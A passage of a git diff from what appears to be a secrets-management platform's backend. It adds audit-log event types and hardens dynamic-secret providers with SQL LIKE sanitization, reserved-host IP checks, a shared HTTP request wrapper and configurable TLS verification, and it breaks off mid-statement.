CmekBulkGetPrivateKeysEvent { + type: EventType.CMEK_BULK_EXPORT_PRIVATE_KEYS; + metadata: { + keys: { keyId: string; name: string }[]; + }; +} + interface GetExternalGroupOrgRoleMappingsEvent { type: EventType.GET_EXTERNAL_GROUP_ORG_ROLE_MAPPINGS; metadata?: Record; // not needed, based off orgId @@ -4288,6 +4381,18 @@ interface DeleteSecretRotationEvent { metadata: TDeleteSecretRotationV2DTO; } +interface MoveSecretRotationEvent { + type: EventType.MOVE_SECRET_ROTATION; + metadata: { + type: string; + rotationId: string; + sourceEnvironment: string; + sourceSecretPath: string; + destinationEnvironment: string; + destinationSecretPath: string; + }; +} + interface RotateSecretRotationEvent { type: EventType.SECRET_ROTATION_ROTATE_SECRETS; metadata: Pick & { @@ -4653,6 +4758,45 @@ interface DashboardGetSecretVersionValueEvent { }; } +interface ViewSecretManagementInsightsCalendarEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_CALENDAR; + metadata: { + projectId: string; + month: number; + year: number; + }; +} + +interface ViewSecretManagementInsightsAccessVolumeEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_VOLUME; + metadata: { + projectId: string; + }; +} + +interface ViewSecretManagementInsightsAccessLocationsEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_LOCATIONS; + metadata: { + projectId: string; + days: number; + }; +} + +interface ViewInsightsAuthMethodsEvent { + type: EventType.VIEW_INSIGHTS_AUTH_METHODS; + metadata: { + projectId: string; + days: number; + }; +} + +interface ViewSecretManagementInsightsSummaryEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_SUMMARY; + metadata: { + projectId: string; + }; +} + interface ProjectRoleCreateEvent { type: EventType.CREATE_PROJECT_ROLE; metadata: { @@ -4825,6 +4969,7 @@ interface PamAccountAccessEvent { resourceName: string; accountName: string; duration?: string; + reason?: string; }; } @@ -4837,11 +4982,22 @@ interface PamWebAccessSessionTicketCreatedEvent { }; } +interface PamAccountAwsConsoleUrlGeneratedEvent { + type: EventType.PAM_ACCOUNT_AWS_CONSOLE_URL_GENERATED; + metadata: { + sessionId: string; + accountId: string; + resourceName: string; + accountName: string; + }; +} + interface PamAccountCreateEvent { type: EventType.PAM_ACCOUNT_CREATE; metadata: { - resourceId: string; - resourceType: string; + resourceId?: string | null; + domainId?: string | null; + parentType: PamParentType; folderId?: string | null; name: string; description?: string | null; @@ -4853,8 +5009,9 @@ interface PamAccountUpdateEvent { type: EventType.PAM_ACCOUNT_UPDATE; metadata: { accountId: string; - resourceId: string; - resourceType: string; + resourceId?: string | null; + domainId?: string | null; + parentType: PamParentType; name?: string; description?: string | null; requireMfa?: boolean | null; @@ -4866,8 +5023,9 @@ interface PamAccountDeleteEvent { metadata: { accountName: string; accountId: string; - resourceId: string; - resourceType: string; + resourceId?: string | null; + domainId?: string | null; + parentType: PamParentType; }; } @@ -4940,8 +5098,10 @@ interface PamAccountReadCredentialsEvent { metadata: { accountId: string; accountName: string; - resourceId: string; - resourceType: string; + resourceId?: string | null; + resourceType?: string | null; + domainId?: string | null; + domainType?: string | null; }; } @@ -4988,6 +5148,49 @@ interface PamResourceDeleteEvent { }; } +interface PamDomainListEvent { + type: EventType.PAM_DOMAIN_LIST; + metadata: { + count: number; + }; +} + +interface PamDomainGetEvent { + type: EventType.PAM_DOMAIN_GET; + metadata: { + domainId: string; + domainType: string; + name: string; + }; +} + +interface PamDomainCreateEvent { + type: EventType.PAM_DOMAIN_CREATE; + metadata: { + domainType: string; + gatewayId?: string; + name: string; + }; +} + +interface PamDomainUpdateEvent { + type: EventType.PAM_DOMAIN_UPDATE; + metadata: { + domainId: string; + domainType: string; + gatewayId?: string; + name?: string; + }; +} + +interface PamDomainDeleteEvent { + type: EventType.PAM_DOMAIN_DELETE; + metadata: { + domainId: string; + domainType: string; + }; +} + interface PamDiscoverySourceListEvent { type: EventType.PAM_DISCOVERY_SOURCE_LIST; metadata: { @@ -5208,6 +5411,15 @@ interface GetCertificateFromRequestEvent { }; } +interface TriggerCertificateRequestValidationEvent { + type: EventType.TRIGGER_CERTIFICATE_REQUEST_VALIDATION; + metadata: { + certificateRequestId: string; + status: string; + orderStatus?: string; + }; +} + interface ListCertificateRequestsEvent { type: EventType.LIST_CERTIFICATE_REQUESTS; metadata: { @@ -5805,7 +6017,7 @@ interface ScepEnrollmentEvent { profileSlug: string; transactionId: string; csrSubject: string; - challengeType: "static"; + challengeType: ScepChallengeType; status: "success" | "pending" | "failure"; failReason?: string; issuedCertificateId?: string; @@ -5830,6 +6042,15 @@ interface ScepRenewalEvent { }; } +interface ScepDynamicChallengeGeneratedEvent { + type: EventType.SCEP_DYNAMIC_CHALLENGE_GENERATED; + metadata: { + profileId: string; + profileSlug: string; + expiresAt: string; + }; +} + interface SecretValidationRuleCreateEvent { type: EventType.SECRET_VALIDATION_RULE_CREATE; metadata: { @@ -5861,6 +6082,31 @@ interface SecretValidationRuleDeleteEvent { }; } +interface ExternalMigrationCreateEvent { + type: EventType.EXTERNAL_MIGRATION_CREATE; + metadata: { + configId: string; + provider: string; + connectionId: string | null; + }; +} + +interface ExternalMigrationUpdateEvent { + type: EventType.EXTERNAL_MIGRATION_UPDATE; + metadata: { + configId: string; + provider: string; + connectionId: string | null; + }; +} + +interface ExternalMigrationDeleteEvent { + type: EventType.EXTERNAL_MIGRATION_DELETE; + metadata: { + configId: string; + provider: string; + }; +} interface CreateEmailDomainEvent { type: EventType.CREATE_EMAIL_DOMAIN; metadata: { @@ -5885,6 +6131,74 @@ interface DeleteEmailDomainEvent { }; } +interface GatewayCreateEvent { + type: EventType.GATEWAY_CREATE; + metadata: { + gatewayId: string; + name: string; + }; +} + +interface GatewayEnrollmentTokenCreateEvent { + type: EventType.GATEWAY_ENROLLMENT_TOKEN_CREATE; + metadata: { + tokenId: string; + name: string; + }; +} + +interface GatewayEnrollEvent { + type: EventType.GATEWAY_ENROLL; + metadata: { + gatewayId: string; + name: string; + }; +} + +interface GatewayPoolCreateEvent { + type: EventType.GATEWAY_POOL_CREATE; + metadata: { + poolId: string; + name: string; + }; +} + +interface GatewayPoolUpdateEvent { + type: EventType.GATEWAY_POOL_UPDATE; + metadata: { + poolId: string; + name: string; + }; +} + +interface GatewayPoolDeleteEvent { + type: EventType.GATEWAY_POOL_DELETE; + metadata: { + poolId: string; + name: string; + }; +} + +interface GatewayPoolAddMemberEvent { + type: EventType.GATEWAY_POOL_ADD_MEMBER; + metadata: { + poolId: string; + poolName: string; + gatewayId: string; + gatewayName: string; + }; +} + +interface GatewayPoolRemoveMemberEvent { + type: EventType.GATEWAY_POOL_REMOVE_MEMBER; + metadata: { + poolId: string; + poolName: string; + gatewayId: string; + gatewayName: string; + }; +} + export type Event = | CreateSubOrganizationEvent | UpdateSubOrganizationEvent @@ -6095,6 +6409,9 @@ export type Event = | GetPkiCollectionItems | AddPkiCollectionItem | DeletePkiCollectionItem + | CreateCertificateInventoryView + | UpdateCertificateInventoryView + | DeleteCertificateInventoryView | CreatePkiSubscriber | UpdatePkiSubscriber | DeletePkiSubscriber @@ -6154,6 +6471,7 @@ export type Event = | CmekListSigningAlgorithmsEvent | CmekGetPublicKeyEvent | CmekGetPrivateKeyEvent + | CmekBulkGetPrivateKeysEvent | GetExternalGroupOrgRoleMappingsEvent | UpdateExternalGroupOrgRoleMappingsEvent | GetProjectTemplatesEvent @@ -6247,6 +6565,7 @@ export type Event = | CreateSecretRotationEvent | UpdateSecretRotationEvent | DeleteSecretRotationEvent + | MoveSecretRotationEvent | RotateSecretRotationEvent | ReconcileSecretRotationEvent | MicrosoftTeamsWorkflowIntegrationCreateEvent @@ -6287,6 +6606,11 @@ export type Event = | DashboardListSecretsEvent | DashboardGetSecretValueEvent | DashboardGetSecretVersionValueEvent + | ViewSecretManagementInsightsCalendarEvent + | ViewSecretManagementInsightsAccessVolumeEvent + | ViewSecretManagementInsightsAccessLocationsEvent + | ViewInsightsAuthMethodsEvent + | ViewSecretManagementInsightsSummaryEvent | ProjectRoleCreateEvent | ProjectRoleUpdateEvent | ProjectRoleDeleteEvent @@ -6307,6 +6631,7 @@ export type Event = | PamAccountListEvent | PamAccountGetEvent | PamAccountAccessEvent + | PamAccountAwsConsoleUrlGeneratedEvent | PamWebAccessSessionTicketCreatedEvent | PamAccountCreateEvent | PamAccountUpdateEvent @@ -6324,6 +6649,11 @@ export type Event = | PamResourceCreateEvent | PamResourceUpdateEvent | PamResourceDeleteEvent + | PamDomainListEvent + | PamDomainGetEvent + | PamDomainCreateEvent + | PamDomainUpdateEvent + | PamDomainDeleteEvent | PamDiscoverySourceListEvent | PamDiscoverySourceGetEvent | PamDiscoverySourceCreateEvent @@ -6346,6 +6676,7 @@ export type Event = | GetCertificateRequestEvent | GetCertificateFromRequestEvent | ListCertificateRequestsEvent + | TriggerCertificateRequestValidationEvent | AutomatedRenewCertificate | AutomatedRenewCertificateFailed | UserLoginEvent @@ -6413,9 +6744,21 @@ export type Event = | CertificateCleanupCompletedEvent | ScepEnrollmentEvent | ScepRenewalEvent + | ScepDynamicChallengeGeneratedEvent | SecretValidationRuleCreateEvent | SecretValidationRuleUpdateEvent | SecretValidationRuleDeleteEvent + | ExternalMigrationCreateEvent + | ExternalMigrationUpdateEvent + | ExternalMigrationDeleteEvent | CreateEmailDomainEvent | VerifyEmailDomainEvent - | DeleteEmailDomainEvent; + | DeleteEmailDomainEvent + | GatewayCreateEvent + | GatewayEnrollmentTokenCreateEvent + | GatewayEnrollEvent + | GatewayPoolCreateEvent + | GatewayPoolUpdateEvent + | GatewayPoolDeleteEvent + | GatewayPoolAddMemberEvent + | GatewayPoolRemoveMemberEvent; diff --git a/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts b/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts index 688db03690d..52f6b03232a 100644 --- a/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts +++ b/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts @@ -1,8 +1,7 @@ import { ProjectMembershipRole } from "@app/db/schemas"; -import { DisableRotationErrors } from "@app/ee/services/secret-rotation/secret-rotation-queue"; import { getConfig } from "@app/lib/config/env"; import { applyJitter } from "@app/lib/delay"; -import { NotFoundError } from "@app/lib/errors"; +import { DisableRotationErrors, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; diff --git a/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts b/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts index 7dcc6836e8d..482bb851949 100644 --- a/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts +++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TDynamicSecrets } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, @@ -142,7 +143,7 @@ export const dynamicSecretDALFactory = (db: TDbClient): TDynamicSecretDALFactory .whereIn("folderId", folderIds) .where((bd) => { if (search) { - void bd.whereILike(`${TableName.DynamicSecret}.name`, `%${search}%`); + void bd.whereILike(`${TableName.DynamicSecret}.name`, `%${sanitizeSqlLikeString(search)}%`); } }) .leftJoin( diff --git a/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts b/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts index af1f422de20..8a440c1aeb1 100644 --- a/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts +++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts @@ -24,6 +24,7 @@ export const verifyHostInputValidity = async ({ const reservedHosts = [appCfg.DB_HOST || getDbConnectionHost(appCfg.DB_CONNECTION_URI)].concat( (appCfg.DB_READ_REPLICAS || []).map((el) => getDbConnectionHost(el.DB_CONNECTION_URI)), getDbConnectionHost(appCfg.REDIS_URL), + getDbConnectionHost(appCfg.CLICKHOUSE_URL), getDbConnectionHost(appCfg.AUDIT_LOGS_DB_CONNECTION_URI) ); @@ -31,26 +32,18 @@ export const verifyHostInputValidity = async ({ const exclusiveIps: string[] = []; for await (const el of reservedHosts) { if (el) { - if (net.isIPv4(el)) { + if (net.isIP(el)) { exclusiveIps.push(el); } else { - try { - const resolvedIps = await dns.resolve4(el); - exclusiveIps.push(...resolvedIps); - } catch (error) { - // only try lookup if not found - if ((error as { code: string })?.code !== "ENOTFOUND") throw error; - - const resolvedIps = (await dns.lookup(el, { all: true, family: 4 })).map(({ address }) => address); - exclusiveIps.push(...resolvedIps); - } + const resolvedIps = (await dns.lookup(el, { all: true })).map(({ address }) => address); + exclusiveIps.push(...resolvedIps); } } } const normalizedHost = host.split(":")[0].toLowerCase(); const inputHostIps: string[] = []; - if (net.isIPv4(host)) { + if (net.isIP(host)) { inputHostIps.push(host); } else { if (!appCfg.DYNAMIC_SECRET_ALLOW_INTERNAL_IP && !appCfg.ALLOW_INTERNAL_IP_CONNECTIONS) { @@ -60,16 +53,8 @@ export const verifyHostInputValidity = async ({ }); } } - try { - const resolvedIps = await dns.resolve4(host); - inputHostIps.push(...resolvedIps); - } catch (error) { - // only try lookup if not found - if ((error as { code: string })?.code !== "ENOTFOUND") throw error; - - const resolvedIps = (await dns.lookup(host, { all: true, family: 4 })).map(({ address }) => address); - inputHostIps.push(...resolvedIps); - } + const resolvedIps = (await dns.lookup(host, { all: true })).map(({ address }) => address); + inputHostIps.push(...resolvedIps); } if (!(appCfg.DYNAMIC_SECRET_ALLOW_INTERNAL_IP || appCfg.ALLOW_INTERNAL_IP_CONNECTIONS)) { diff --git a/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts b/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts index b5c82fd624d..b0165ae7cbd 100644 --- a/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts +++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts @@ -616,7 +616,7 @@ export const dynamicSecretServiceFactory = ({ } const dynamicSecretCfg = await dynamicSecretDAL.find( - { $in: { folderId: folders.map((folder) => folder.id) }, $search: search ? { name: `%${search}%` } : undefined }, + { $in: { folderId: folders.map((folder) => folder.id) }, $search: search ? { name: search } : undefined }, { countDistinct: "name" } ); @@ -653,7 +653,7 @@ export const dynamicSecretServiceFactory = ({ } const dynamicSecretCfg = await dynamicSecretDAL.find( - { folderId: folder.id, $search: search ? { name: `%${search}%` } : undefined }, + { folderId: folder.id, $search: search ? { name: search } : undefined }, { count: true } ); return Number(dynamicSecretCfg[0]?.count ?? 0); @@ -697,7 +697,7 @@ export const dynamicSecretServiceFactory = ({ throw new NotFoundError({ message: `Folder with path '${path}' in environment '${environmentSlug}' not found` }); const dynamicSecretCfg = await dynamicSecretDAL.findWithMetadata( - { folderId: folder.id, $search: search ? { name: `%${search}%` } : undefined }, + { folderId: folder.id, $search: search ? { name: search } : undefined }, { limit, offset, diff --git a/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts b/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts index 0ce83a49afe..6cf5c9c9fdd 100644 --- a/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts +++ b/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts @@ -255,7 +255,9 @@ export const AwsElastiCacheDatabaseProvider = (): TDynamicProviderFns => { const revoke = async (inputs: unknown, entityId: string) => { const providerInputs = await validateProviderInputs(inputs); - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username: entityId }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username: entityId + }); const parsedStatement = DeleteElasticCacheUserSchema.parse(JSON.parse(revokeStatement)); try { diff --git a/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts b/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts index 98386c4d37d..cc72f268b36 100644 --- a/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts +++ b/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts @@ -1,6 +1,6 @@ -import axios from "axios"; import { customAlphabet } from "nanoid"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; @@ -29,7 +29,7 @@ export const AzureEntraIDProvider = (): TDynamicProviderFns & { applicationId: string, clientSecret: string ): Promise<{ token?: string; success: boolean }> => { - const response = await axios.post<{ access_token: string }>( + const response = await request.post<{ access_token: string }>( `${MSFT_LOGIN_URL}/${tenantId}/oauth2/v2.0/token`, { grant_type: "client_credentials", @@ -76,7 +76,7 @@ export const AzureEntraIDProvider = (): TDynamicProviderFns & { throw new BadRequestError({ message: "Failed to authorize to Microsoft Entra ID" }); } - const response = await axios.patch( + const response = await request.patch( `${MSFT_GRAPH_API_URL}/users/${providerInputs.userId}`, { passwordProfile: { @@ -136,7 +136,7 @@ export const AzureEntraIDProvider = (): TDynamicProviderFns & { throw new BadRequestError({ message: "Failed to authorize to Microsoft Entra ID" }); } - const response = await axios.get<{ value: [{ id: string; displayName: string; userPrincipalName: string }] }>( + const response = await request.get<{ value: [{ id: string; displayName: string; userPrincipalName: string }] }>( `${MSFT_GRAPH_API_URL}/users`, { headers: { diff --git a/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts b/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts index 8b1580cac5d..00c77013bf8 100644 --- a/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts +++ b/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts @@ -145,7 +145,11 @@ export const AzureSqlDatabaseProvider = ({ targetDatabase?: string ) => { const ssl = providerInputs.ca - ? { rejectUnauthorized: false, ca: providerInputs.ca, servername: providerInputs.host } + ? { + rejectUnauthorized: providerInputs.sslRejectUnauthorized, + ca: providerInputs.ca, + servername: providerInputs.originalHost + } : undefined; /* @@ -177,7 +181,7 @@ export const AzureSqlDatabaseProvider = ({ // https://github.com/tediousjs/tedious/blob/ebb023ed90969a7ec0e4b036533ad52739d921f7/test/config.ci.ts#L19 options: { ...(providerInputs.sslEnabled !== undefined ? { encrypt: providerInputs.sslEnabled } : {}), - trustServerCertificate: !providerInputs.ca, + trustServerCertificate: !providerInputs.sslRejectUnauthorized, cryptoCredentialsDetails: providerInputs.ca ? { ca: providerInputs.ca } : {} } }, @@ -367,7 +371,10 @@ export const AzureSqlDatabaseProvider = ({ const { database, masterDatabase } = providerInputs; const gatewayCallback = async (host = providerInputs.host, port = providerInputs.port) => { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username, database }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username, + database + }); const queries = revokeStatement.toString().split(";").filter(Boolean); const userDropQueries = queries.filter((query) => query.toLowerCase().includes("drop user")); @@ -487,7 +494,7 @@ export const AzureSqlDatabaseProvider = ({ const expiration = new Date(expireAt).toISOString(); const { database } = providerInputs; - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, expiration, database diff --git a/backend/src/ee/services/dynamic-secret/providers/cassandra.ts b/backend/src/ee/services/dynamic-secret/providers/cassandra.ts index 1b3413141a4..79160924b76 100644 --- a/backend/src/ee/services/dynamic-secret/providers/cassandra.ts +++ b/backend/src/ee/services/dynamic-secret/providers/cassandra.ts @@ -43,7 +43,9 @@ export const CassandraProvider = (): TDynamicProviderFns => { }; const $getClient = async (providerInputs: z.infer) => { - const sslOptions = providerInputs.ca ? { rejectUnauthorized: false, ca: providerInputs.ca } : undefined; + const sslOptions = providerInputs.ca + ? { rejectUnauthorized: providerInputs.sslRejectUnauthorized, ca: providerInputs.ca } + : undefined; const client = new cassandra.Client({ sslOptions, protocolOptions: { @@ -146,7 +148,10 @@ export const CassandraProvider = (): TDynamicProviderFns => { const { keyspace } = providerInputs; try { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username, keyspace }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username, + keyspace + }); const queries = revokeStatement.toString().split(";").filter(Boolean); for (const query of queries) { // eslint-disable-next-line @@ -180,7 +185,7 @@ export const CassandraProvider = (): TDynamicProviderFns => { try { const expiration = new Date(expireAt).toISOString(); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, keyspace, expiration diff --git a/backend/src/ee/services/dynamic-secret/providers/couchbase.ts b/backend/src/ee/services/dynamic-secret/providers/couchbase.ts index 090eb549b20..06ed1c38e93 100644 --- a/backend/src/ee/services/dynamic-secret/providers/couchbase.ts +++ b/backend/src/ee/services/dynamic-secret/providers/couchbase.ts @@ -1,9 +1,9 @@ import crypto from "node:crypto"; -import axios from "axios"; import RE2 from "re2"; import { TDynamicSecrets } from "@app/db/schemas"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; import { alphaNumericNanoId } from "@app/lib/nanoid"; @@ -159,7 +159,7 @@ const couchbaseApiRequest = async ( await blockLocalAndPrivateIpAddresses(url); try { - const response = await axios({ + const response = await request({ method: method.toLowerCase() as "get" | "post" | "put" | "delete", url, headers: { @@ -167,7 +167,8 @@ const couchbaseApiRequest = async ( "Content-Type": "application/json" }, data: data || undefined, - timeout: 30000 + timeout: 30000, + maxRedirects: 0 }); return response.data as CouchbaseUserResponse; diff --git a/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts b/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts index 85c85f43696..5aaf73f3d0d 100644 --- a/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts +++ b/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts @@ -30,7 +30,7 @@ export const ElasticSearchProvider = (): TDynamicProviderFns => { url: new URL(`${providerInputs.host}:${providerInputs.port}`), ...(providerInputs.ca && { ssl: { - rejectUnauthorized: false, + rejectUnauthorized: providerInputs.sslRejectUnauthorized, ca: providerInputs.ca } }) diff --git a/backend/src/ee/services/dynamic-secret/providers/github.ts b/backend/src/ee/services/dynamic-secret/providers/github.ts index d3259064ae8..408189f56ce 100644 --- a/backend/src/ee/services/dynamic-secret/providers/github.ts +++ b/backend/src/ee/services/dynamic-secret/providers/github.ts @@ -1,6 +1,7 @@ -import axios from "axios"; +import { isAxiosError } from "axios"; import jwt from "jsonwebtoken"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, InternalServerError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; @@ -56,7 +57,7 @@ export const GithubProvider = (): TDynamicProviderFns => { const tokenUrl = `${IntegrationUrls.GITHUB_API_URL}/app/installations/${String(installationId)}/access_tokens`; try { - const response = await axios.post(tokenUrl, undefined, { + const response = await request.post(tokenUrl, undefined, { headers: { Authorization: `Bearer ${appJwt}`, Accept: "application/vnd.github.v3+json", @@ -73,7 +74,7 @@ export const GithubProvider = (): TDynamicProviderFns => { }); } catch (error) { let message = "Failed to fetch GitHub installation access token."; - if (axios.isAxiosError(error) && error.response) { + if (isAxiosError(error) && error.response) { const githubErrorMsg = (error.response.data as { message?: string })?.message || JSON.stringify(error.response.data); message += ` GitHub API Error: ${error.response.status} - ${githubErrorMsg}`; diff --git a/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts b/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts index a9b9cf1c276..5dac4914fc1 100644 --- a/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts +++ b/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts @@ -1,7 +1,8 @@ -import axios, { AxiosError } from "axios"; +import { AxiosError, isAxiosError } from "axios"; import https from "https"; import { TDynamicSecrets } from "@app/db/schemas"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; import { GatewayHttpProxyActions, GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway"; @@ -135,7 +136,7 @@ export const KubernetesProvider = ({ for await (const namespace of namespaces) { try { // 1. Create a test service account - await axios.post( + await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts`, { metadata: { @@ -171,7 +172,7 @@ export const KubernetesProvider = ({ ...(providerInputs.roleType !== KubernetesRoleType.ClusterRole && { namespace }) }; - await axios.post( + await request.post( roleBindingUrl, { metadata: roleBindingMetadata, @@ -206,7 +207,7 @@ export const KubernetesProvider = ({ ); // 3. Request a token for the test service account - await axios.post( + await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}/token`, { spec: { @@ -233,7 +234,7 @@ export const KubernetesProvider = ({ // 4. Cleanup: delete role binding and service account if (providerInputs.roleType === KubernetesRoleType.Role) { - await axios.delete( + await request.delete( `${baseUrl}/apis/rbac.authorization.k8s.io/v1/namespaces/${namespace}/rolebindings/${roleBindingName}`, { headers: { @@ -252,24 +253,27 @@ export const KubernetesProvider = ({ } ); } else { - await axios.delete(`${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, { - headers: { - "Content-Type": "application/json", - ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway - ? { "x-infisical-action": GatewayHttpProxyActions.UseGatewayK8sServiceAccount } - : { Authorization: `Bearer ${providerInputs.clusterToken}` }) - }, - ...(providerInputs.authMethod === KubernetesAuthMethod.Api - ? { - httpsAgent - } - : {}), - signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), - timeout: EXTERNAL_REQUEST_TIMEOUT - }); + await request.delete( + `${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, + { + headers: { + "Content-Type": "application/json", + ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway + ? { "x-infisical-action": GatewayHttpProxyActions.UseGatewayK8sServiceAccount } + : { Authorization: `Bearer ${providerInputs.clusterToken}` }) + }, + ...(providerInputs.authMethod === KubernetesAuthMethod.Api + ? { + httpsAgent + } + : {}), + signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), + timeout: EXTERNAL_REQUEST_TIMEOUT + } + ); } - await axios.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}`, { + await request.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}`, { headers: { "Content-Type": "application/json", ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway @@ -305,7 +309,7 @@ export const KubernetesProvider = ({ const baseUrl = port ? `${host}:${port}` : host; - await axios.get( + await request.get( `${baseUrl}/api/v1/namespaces/${providerInputs.namespace}/serviceaccounts/${providerInputs.serviceAccountName}`, { headers: { @@ -337,7 +341,7 @@ export const KubernetesProvider = ({ providerInputs.ca && providerInputs.sslEnabled ? new https.Agent({ ca: providerInputs.ca, - rejectUnauthorized: true + rejectUnauthorized: providerInputs.sslRejectUnauthorized }) : undefined; @@ -378,7 +382,7 @@ export const KubernetesProvider = ({ return true; } catch (error) { let errorMessage = error instanceof Error ? error.message : "Unknown error"; - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response) { let { message } = error?.response?.data as unknown as { message?: string }; @@ -452,7 +456,7 @@ export const KubernetesProvider = ({ } // 1. Create the service account - await axios.post( + await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts`, { metadata: { @@ -488,7 +492,7 @@ export const KubernetesProvider = ({ ...(providerInputs.roleType !== KubernetesRoleType.ClusterRole && { namespace }) }; - await axios.post( + await request.post( roleBindingUrl, { metadata: roleBindingMetadata, @@ -523,7 +527,7 @@ export const KubernetesProvider = ({ ); // 3. Request a token for the service account - const res = await axios.post( + const res = await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}/token`, { spec: { @@ -564,7 +568,7 @@ export const KubernetesProvider = ({ const baseUrl = port ? `${host}:${port}` : host; - const res = await axios.post( + const res = await request.post( `${baseUrl}/api/v1/namespaces/${providerInputs.namespace}/serviceaccounts/${providerInputs.serviceAccountName}/token`, { spec: { @@ -606,7 +610,7 @@ export const KubernetesProvider = ({ providerInputs.ca && providerInputs.sslEnabled ? new https.Agent({ ca: providerInputs.ca, - rejectUnauthorized: true + rejectUnauthorized: providerInputs.sslRejectUnauthorized }) : undefined; @@ -651,7 +655,7 @@ export const KubernetesProvider = ({ }; } catch (error) { let errorMessage = error instanceof Error ? error.message : "Unknown error"; - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response) { let { message } = error?.response?.data as unknown as { message?: string }; @@ -695,7 +699,7 @@ export const KubernetesProvider = ({ const namespace = config?.namespace ?? providerInputs.namespace.split(",")[0].trim(); if (providerInputs.roleType === KubernetesRoleType.Role) { - await axios.delete( + await request.delete( `${baseUrl}/apis/rbac.authorization.k8s.io/v1/namespaces/${namespace}/rolebindings/${roleBindingName}`, { headers: { @@ -714,7 +718,7 @@ export const KubernetesProvider = ({ } ); } else { - await axios.delete(`${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, { + await request.delete(`${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, { headers: { "Content-Type": "application/json", ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway @@ -732,7 +736,7 @@ export const KubernetesProvider = ({ } // Delete the service account - await 